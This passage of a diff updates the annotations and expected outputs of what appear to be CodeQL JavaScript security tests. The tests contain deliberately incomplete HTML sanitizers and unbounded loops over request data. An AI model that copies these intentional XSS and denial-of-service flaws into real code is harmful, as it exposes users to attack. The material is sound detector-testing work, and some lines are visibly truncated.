capture groups - /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // NOT OK - capture groups - /|<([^>]*?)>/g, // NOT OK - capture groups + /)|([^\/\s>]+)[\S\s]*?>/, // $ Alert - doesn't match comments with the right capture groups + /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // $ Alert - capture groups + /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // $ Alert - capture groups + /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // $ Alert - capture groups + /|<([^>]*?)>/g, // $ Alert - capture groups ] doFilters(filters) @@ -28,8 +28,8 @@ var strip = ']*)>([\\S\\s]*?)<\/script([^>]*)>'; // OK - it's used w new RegExp(strip, 'gi'); var moreFilters = [ - /-->/g, // NOT OK - doesn't match --!> - /^>|^->||--!>|/g, // $ Alert - doesn't match --!> + /^>|^->||--!>| repl[c]).replace(/&/g, "&"); + return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); // $ Alert } // dubious, but out of scope for this query @@ -98,17 +98,17 @@ function encodeDecodeEncode(s) { function badEncode(s) { return s.replace(new RegExp("\"", "g"), """) .replace(new RegExp("\'", "g"), "'") - .replace(new RegExp("&", "g"), "&"); // NOT OK + .replace(new RegExp("&", "g"), "&"); // $ Alert } function goodEncode(s) { return s.replace(new RegExp("\"", ""), """) .replace(new RegExp("\'", ""), "'") - .replace(new RegExp("&", ""), "&"); // OK + .replace(new RegExp("&", ""), "&"); } function goodEncode(s) { return s.replace(new RegExp("\"", unknownFlags()), """) .replace(new RegExp("\'", unknownFlags()), "'") - .replace(new RegExp("&", unknownFlags()), "&"); // OK + .replace(new RegExp("&", unknownFlags()), "&"); } diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.expected b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.expected index 7af957d720a1..162ff1c05993 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.expected +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.expected @@ -1,3 +1,21 @@ +#select +| tst.js:243:9:243:31 | s().rep ... ]/g,'') | tst.js:243:9:243:31 | s().rep ... ]/g,'') | tst.js:243:9:243:31 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:243:9:243:31 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:244:9:244:33 | s().rep ... /g, '') | tst.js:244:9:244:33 | s().rep ... /g, '') | tst.js:244:9:244:33 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:244:9:244:33 | s().rep ... /g, '') | this final HTML sanitizer step | +| tst.js:249:9:249:33 | s().rep ... ]/g,'') | tst.js:249:9:249:33 | s().rep ... ]/g,'') | tst.js:249:9:249:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:249:9:249:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:250:9:250:33 | s().rep ... ]/g,'') | tst.js:250:9:250:33 | s().rep ... ]/g,'') | tst.js:250:9:250:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:250:9:250:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:253:21:253:45 | s().rep ... /g, '') | tst.js:253:21:253:45 | s().rep ... /g, '') | tst.js:253:21:253:45 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:253:21:253:45 | s().rep ... /g, '') | this final HTML sanitizer step | +| tst.js:254:32:254:56 | s().rep ... /g, '') | tst.js:254:32:254:56 | s().rep ... /g, '') | tst.js:254:32:254:56 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:254:32:254:56 | s().rep ... /g, '') | this final HTML sanitizer step | +| tst.js:270:61:270:85 | s().rep ... /g, '') | tst.js:270:61:270:85 | s().rep ... /g, '') | tst.js:270:61:270:85 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:270:61:270:85 | s().rep ... /g, '') | this final HTML sanitizer step | +| tst.js:275:9:275:21 | arr.join(" ") | tst.js:274:12:274:94 | s().val ... g , '') | tst.js:275:9:275:21 | arr.join(" ") | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:274:12:274:94 | s().val ... g , '') | this final HTML sanitizer step | +| tst.js:300:10:300:33 | s().rep ... ]/g,'') | tst.js:300:10:300:33 | s().rep ... ]/g,'') | tst.js:300:10:300:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:300:10:300:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:301:10:301:32 | s().rep ... ]/g,'') | tst.js:301:10:301:32 | s().rep ... ]/g,'') | tst.js:301:10:301:32 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:301:10:301:32 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:302:10:302:34 | s().rep ... ]/g,'') | tst.js:302:10:302:34 | s().rep ... ]/g,'') | tst.js:302:10:302:34 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:302:10:302:34 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:303:10:303:34 | s().rep ... /g, '') | tst.js:303:10:303:34 | s().rep ... /g, '') | tst.js:303:10:303:34 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:303:10:303:34 | s().rep ... /g, '') | this final HTML sanitizer step | +| tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | this final HTML sanitizer step | +edges +| tst.js:274:6:274:94 | arr | tst.js:275:9:275:11 | arr | provenance | | +| tst.js:274:12:274:94 | s().val ... g , '') | tst.js:274:6:274:94 | arr | provenance | | +| tst.js:275:9:275:11 | arr | tst.js:275:9:275:21 | arr.join(" ") | provenance | | nodes | tst.js:243:9:243:31 | s().rep ... ]/g,'') | semmle.label | s().rep ... ]/g,'') | | tst.js:244:9:244:33 | s().rep ... /g, '') | semmle.label | s().rep ... /g, '') | @@ -15,22 +33,4 @@ nodes | tst.js:302:10:302:34 | s().rep ... ]/g,'') | semmle.label | s().rep ... ]/g,'') | | tst.js:303:10:303:34 | s().rep ... /g, '') | semmle.label | s().rep ... /g, '') | | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | semmle.label | s().rep ... ;";\\n\\t}) | -edges -| tst.js:274:6:274:94 | arr | tst.js:275:9:275:11 | arr | provenance | | -| tst.js:274:12:274:94 | s().val ... g , '') | tst.js:274:6:274:94 | arr | provenance | | -| tst.js:275:9:275:11 | arr | tst.js:275:9:275:21 | arr.join(" ") | provenance | | subpaths -#select -| tst.js:243:9:243:31 | s().rep ... ]/g,'') | tst.js:243:9:243:31 | s().rep ... ]/g,'') | tst.js:243:9:243:31 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:243:9:243:31 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:244:9:244:33 | s().rep ... /g, '') | tst.js:244:9:244:33 | s().rep ... /g, '') | tst.js:244:9:244:33 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:244:9:244:33 | s().rep ... /g, '') | this final HTML sanitizer step | -| tst.js:249:9:249:33 | s().rep ... ]/g,'') | tst.js:249:9:249:33 | s().rep ... ]/g,'') | tst.js:249:9:249:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:249:9:249:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:250:9:250:33 | s().rep ... ]/g,'') | tst.js:250:9:250:33 | s().rep ... ]/g,'') | tst.js:250:9:250:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:250:9:250:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:253:21:253:45 | s().rep ... /g, '') | tst.js:253:21:253:45 | s().rep ... /g, '') | tst.js:253:21:253:45 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:253:21:253:45 | s().rep ... /g, '') | this final HTML sanitizer step | -| tst.js:254:32:254:56 | s().rep ... /g, '') | tst.js:254:32:254:56 | s().rep ... /g, '') | tst.js:254:32:254:56 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:254:32:254:56 | s().rep ... /g, '') | this final HTML sanitizer step | -| tst.js:270:61:270:85 | s().rep ... /g, '') | tst.js:270:61:270:85 | s().rep ... /g, '') | tst.js:270:61:270:85 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:270:61:270:85 | s().rep ... /g, '') | this final HTML sanitizer step | -| tst.js:275:9:275:21 | arr.join(" ") | tst.js:274:12:274:94 | s().val ... g , '') | tst.js:275:9:275:21 | arr.join(" ") | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:274:12:274:94 | s().val ... g , '') | this final HTML sanitizer step | -| tst.js:300:10:300:33 | s().rep ... ]/g,'') | tst.js:300:10:300:33 | s().rep ... ]/g,'') | tst.js:300:10:300:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:300:10:300:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:301:10:301:32 | s().rep ... ]/g,'') | tst.js:301:10:301:32 | s().rep ... ]/g,'') | tst.js:301:10:301:32 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:301:10:301:32 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:302:10:302:34 | s().rep ... ]/g,'') | tst.js:302:10:302:34 | s().rep ... ]/g,'') | tst.js:302:10:302:34 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:302:10:302:34 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:303:10:303:34 | s().rep ... /g, '') | tst.js:303:10:303:34 | s().rep ... /g, '') | tst.js:303:10:303:34 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:303:10:303:34 | s().rep ... /g, '') | this final HTML sanitizer step | -| tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | this final HTML sanitizer step | diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.qlref b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.qlref index d6963163eef5..d8af0686b84a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.qlref @@ -1 +1,2 @@ -Security/CWE-116/IncompleteHtmlAttributeSanitization.ql \ No newline at end of file +query: Security/CWE-116/IncompleteHtmlAttributeSanitization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected index 96a48fec6cb8..22b3868a62a8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected @@ -18,25 +18,25 @@ | tst-multi-character-sanitization.js:83:7:83:63 | x.repla ... gi, "") | This string may still contain $@, which may cause an HTML element injection vulnerability. | tst-multi-character-sanitization.js:83:18:83:21 | /gm, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/g, ""); // NOT OK (ng-attributes) + x = x.replace(//gm, ""); // $ Alert[js/incomplete-multi-character-sanitization] + x = x.replace(/\sng-[a-z-]+/, ""); // $ Alert[js/incomplete-multi-character-sanitization] + x = x.replace(/\sng-[a-z-]+/g, ""); // $ Alert[js/incomplete-multi-character-sanitization] - ng-attributes - x = x.replace(/()/g, "\n"); // OK: not a sanitizer + x = x.replace(/()/g, "\n"); // OK - not a sanitizer - x = x.replace(//g, ""); // OK [INCONSISTENCY] - x = x.replace(/> - > - > - - + > + > + > + + - - - + + + - + - - + \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html index 6b9fbfe65c8a..97ed8b016f00 100644 --- a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html +++ b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html @@ -1,7 +1,7 @@ Polyfill.io demo - + ... diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.expected b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.expected index 511e776ed3c8..6aedcc6c4c56 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.expected @@ -1,3 +1,13 @@ +#select +| LoopBoundInjectionBad.js:20:25:20:27 | val | LoopBoundInjectionBad.js:8:13:8:20 | req.body | LoopBoundInjectionBad.js:20:25:20:27 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:8:13:8:20 | req.body | user-provided value | +| LoopBoundInjectionBad.js:29:16:29:18 | val | LoopBoundInjectionBad.js:10:15:10:22 | req.body | LoopBoundInjectionBad.js:29:16:29:18 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:10:15:10:22 | req.body | user-provided value | +| LoopBoundInjectionBad.js:38:15:38:17 | val | LoopBoundInjectionBad.js:12:25:12:32 | req.body | LoopBoundInjectionBad.js:38:15:38:17 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:12:25:12:32 | req.body | user-provided value | +| LoopBoundInjectionBad.js:51:25:51:27 | val | LoopBoundInjectionBad.js:14:19:14:26 | req.body | LoopBoundInjectionBad.js:51:25:51:27 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:14:19:14:26 | req.body | user-provided value | +| LoopBoundInjectionExitBad.js:20:22:20:24 | val | LoopBoundInjectionExitBad.js:8:9:8:16 | req.body | LoopBoundInjectionExitBad.js:20:22:20:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:8:9:8:16 | req.body | user-provided value | +| LoopBoundInjectionExitBad.js:34:22:34:24 | val | LoopBoundInjectionExitBad.js:10:9:10:16 | req.body | LoopBoundInjectionExitBad.js:34:22:34:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:10:9:10:16 | req.body | user-provided value | +| LoopBoundInjectionExitBad.js:49:22:49:24 | val | LoopBoundInjectionExitBad.js:12:10:12:17 | req.body | LoopBoundInjectionExitBad.js:49:22:49:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:12:10:12:17 | req.body | user-provided value | +| LoopBoundInjectionExitBad.js:60:8:60:10 | val | LoopBoundInjectionExitBad.js:14:14:14:21 | req.body | LoopBoundInjectionExitBad.js:60:8:60:10 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:14:14:14:21 | req.body | user-provided value | +| LoopBoundInjectionLodash.js:13:13:13:15 | val | LoopBoundInjectionLodash.js:9:13:9:20 | req.body | LoopBoundInjectionLodash.js:13:13:13:15 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionLodash.js:9:13:9:20 | req.body | user-provided value | edges | LoopBoundInjectionBad.js:8:13:8:20 | req.body | LoopBoundInjectionBad.js:17:18:17:20 | val | provenance | | | LoopBoundInjectionBad.js:10:15:10:22 | req.body | LoopBoundInjectionBad.js:25:20:25:22 | val | provenance | | @@ -46,13 +56,3 @@ nodes | LoopBoundInjectionLodash.js:12:18:12:20 | val | semmle.label | val | | LoopBoundInjectionLodash.js:13:13:13:15 | val | semmle.label | val | subpaths -#select -| LoopBoundInjectionBad.js:20:25:20:27 | val | LoopBoundInjectionBad.js:8:13:8:20 | req.body | LoopBoundInjectionBad.js:20:25:20:27 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:8:13:8:20 | req.body | user-provided value | -| LoopBoundInjectionBad.js:29:16:29:18 | val | LoopBoundInjectionBad.js:10:15:10:22 | req.body | LoopBoundInjectionBad.js:29:16:29:18 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:10:15:10:22 | req.body | user-provided value | -| LoopBoundInjectionBad.js:38:15:38:17 | val | LoopBoundInjectionBad.js:12:25:12:32 | req.body | LoopBoundInjectionBad.js:38:15:38:17 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:12:25:12:32 | req.body | user-provided value | -| LoopBoundInjectionBad.js:51:25:51:27 | val | LoopBoundInjectionBad.js:14:19:14:26 | req.body | LoopBoundInjectionBad.js:51:25:51:27 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:14:19:14:26 | req.body | user-provided value | -| LoopBoundInjectionExitBad.js:20:22:20:24 | val | LoopBoundInjectionExitBad.js:8:9:8:16 | req.body | LoopBoundInjectionExitBad.js:20:22:20:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:8:9:8:16 | req.body | user-provided value | -| LoopBoundInjectionExitBad.js:34:22:34:24 | val | LoopBoundInjectionExitBad.js:10:9:10:16 | req.body | LoopBoundInjectionExitBad.js:34:22:34:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:10:9:10:16 | req.body | user-provided value | -| LoopBoundInjectionExitBad.js:49:22:49:24 | val | LoopBoundInjectionExitBad.js:12:10:12:17 | req.body | LoopBoundInjectionExitBad.js:49:22:49:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:12:10:12:17 | req.body | user-provided value | -| LoopBoundInjectionExitBad.js:60:8:60:10 | val | LoopBoundInjectionExitBad.js:14:14:14:21 | req.body | LoopBoundInjectionExitBad.js:60:8:60:10 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:14:14:14:21 | req.body | user-provided value | -| LoopBoundInjectionLodash.js:13:13:13:15 | val | LoopBoundInjectionLodash.js:9:13:9:20 | req.body | LoopBoundInjectionLodash.js:13:13:13:15 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionLodash.js:9:13:9:20 | req.body | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.qlref index 8186c4fca6a3..6313b6e4f63d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.qlref @@ -1 +1,2 @@ -Security/CWE-834/LoopBoundInjection.ql \ No newline at end of file +query: Security/CWE-834/LoopBoundInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js index bca6567b4f5e..ea92479d9b97 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js @@ -5,19 +5,19 @@ var router = new express.Router(); var rootRoute = router.route('foobar'); rootRoute.post(function(req, res) { - problem(req.body); + problem(req.body); // $ Source - whileLoop(req.body); + whileLoop(req.body); // $ Source - useLengthIndirectly(req.body); + useLengthIndirectly(req.body); // $ Source - noNullPointer(req.body); + noNullPointer(req.body); // $ Source }); function problem(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert ret.push(val[i]); } } @@ -26,7 +26,7 @@ function whileLoop(val) { var ret = []; var i = 0; - while (i < val.length) { // NOT OK! + while (i < val.length) { // $ Alert ret.push(val[i]); i++; } @@ -35,7 +35,7 @@ function whileLoop(val) { function useLengthIndirectly(val) { var ret = []; - var len = val.length; // NOT OK! + var len = val.length; // $ Alert for (var i = 0; i < len; i++) { ret.push(val[i]); @@ -48,7 +48,7 @@ function noNullPointer(val) { const c = 0; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert // Constantly accessing element 0, therefore not guaranteed null-pointer. ret.push(val[c].foo); diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js index 3193a384aca2..3ce829e1f19f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js @@ -5,19 +5,19 @@ var rootRoute = router.route('foobar'); var _ = require("lodash"); rootRoute.post(function (req, res) { - breaks(req.body); + breaks(req.body); // $ Source - throws(req.body); + throws(req.body); // $ Source - returns(req.body); + returns(req.body); // $ Source - lodashThrow(req.body); + lodashThrow(req.body); // $ Source }); function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert for (var k = 0; k < 2; k++) { if (k == 3) { // Does not prevent DoS, because this is inside an inner loop. @@ -31,7 +31,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { try { throw 2; // Is caught, and therefore the DoS is not prevented. @@ -46,7 +46,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { (function (i) { return i+2; // Does not prevent DoS. @@ -57,7 +57,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // NOT OK! + _.map(val, function (e) { // $ Alert if (!e) { try { throw new Error(); // Does not prevent DoS. diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js index 705ec6b5b0ea..71586956dad2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js @@ -17,7 +17,7 @@ rootRoute.post(function (req, res) { function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { break; // Prevents DoS. } @@ -28,7 +28,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { throw 2; // Prevents DoS. } @@ -40,7 +40,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { return 2; // Prevents DoS. } @@ -49,7 +49,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // OK + _.map(val, function (e) { if (!e) { throw new Error(); // Prevents DoS. } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js index 49c813834450..ddd0dcf3301d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js @@ -23,7 +23,7 @@ function sanitized(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -35,7 +35,7 @@ function sanitized2(val) { return []; } // Val can only be a primitive. Therefore no issue! - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -53,7 +53,7 @@ function sanitized3(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -67,7 +67,7 @@ function sanitized4(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js index 2f2fdb0d67a0..6445d3bfbb82 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js @@ -6,9 +6,9 @@ var router = new express.Router(); var rootRoute = router.route('foobar'); rootRoute.post(function(req, res) { - problem(req.body); + problem(req.body); // $ Source }); function problem(val) { - _.chunk(val, 2); // NOT OK! + _.chunk(val, 2); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js index 22649392557e..a9817883f082 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js @@ -16,7 +16,7 @@ function problem(val) { return []; } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js index b8e4b1f50971..bd3aed633ff5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js @@ -21,7 +21,7 @@ rootRoute.post(function(req, res) { function nullPointer(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo + 42); } } @@ -30,7 +30,7 @@ function nullPointer(val) { function nullPointer2(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { var element = val[i]; ret.push(element.foo + 42); } @@ -38,7 +38,7 